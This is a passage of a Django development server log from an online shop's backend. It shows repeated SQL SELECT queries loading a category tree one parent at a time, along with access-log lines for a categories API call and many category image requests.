WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-03 16:36:45,756 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-03 16:36:45,759 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-03 16:36:45,763 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-03 16:36:45,767 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-03 16:36:45,773 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-03 16:36:45,777 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-03 16:36:45,781 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-03 16:36:45,785 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-03 16:36:45,789 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-03 16:36:45,793 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-03 16:36:45,795 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-03 16:36:45,798 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-03 16:36:45,800 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-03 16:36:45,802 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-03 16:36:45,806 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-03 16:36:45,808 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-03 16:36:45,810 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-03 16:36:45,813 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-03 16:36:45,815 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-03 16:36:45,817 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-03 16:36:45,820 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-03 16:36:45,823 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-03 16:36:45,825 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-03 16:36:45,828 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-03 16:36:45,830 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [03/Jan/2020 16:36:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [03/Jan/2020 16:36:45] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [03/Jan/2020 16:36:45] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [03/Jan/2020 16:36:46] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [03/Jan/2020 16:36:47] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [03/Jan/2020 16:36:47] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [03/Jan/2020 16:36:47] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [03/Jan/2020 16:36:47] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [03/Jan/2020 16:36:48] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [03/Jan/2020 16:36:48] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [03/Jan/2020 16:36:48] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [03/Jan/2020 16:36:48] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [03/Jan/2020 16:36:48] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [03/Jan/2020 16:36:48] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [03/Jan/2020 16:36:49] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [03/Jan/2020 16:36:49] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [03/Jan/2020 16:36:49] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [03/Jan/2020 16:36:49] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [03/Jan/2020 16:36:49] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [03/Jan/2020 16:36:49] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [03/Jan/2020 16:36:49] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [03/Jan/2020 16:36:49] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [03/Jan/2020 16:36:50] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [03/Jan/2020 16:36:50] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [03/Jan/2020 16:36:50] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [03/Jan/2020 16:36:50] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [03/Jan/2020 16:36:50] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [03/Jan/2020 16:36:50] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 DEBUG 2020-01-03 16:36:50,694 utils 27361 140408443102976 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-03 16:36:50,707 utils 27361 140408443102976 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-03 16:36:50,712 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-03 16:36:50,716 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-03 16:36:50,721 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-03 16:36:50,725 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-03 16:36:50,728 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-03 16:36:50,731 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-03 16:36:50,734 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-03 16:36:50,738 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-03 16:36:50,741 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-03 16:36:50,744 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-03 16:36:50,747 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-03 16:36:50,750 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-03 16:36:50,755 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-03 16:36:50,758 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-03 16:36:50,762 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-03 16:36:50,764 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-03 16:36:50,768 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-03 16:36:50,773 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-03 16:36:50,776 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-03 16:36:50,780 utils 27361 140408443102976 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-03 16:36:50,784 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-03 16:36:50,787 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-03 16:36:50,791 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-03 16:36:50,797 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-03 16:36:50,801 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-03 16:36:50,805 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-03 16:36:50,809 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-03 16:36:50,813 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-03 16:36:50,819 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-03 16:36:50,823 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-03 16:36:50,827 utils 27361 140408443102976 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-03 16:36:50,831 utils 27361 140408443102976 (0.001) SELECT 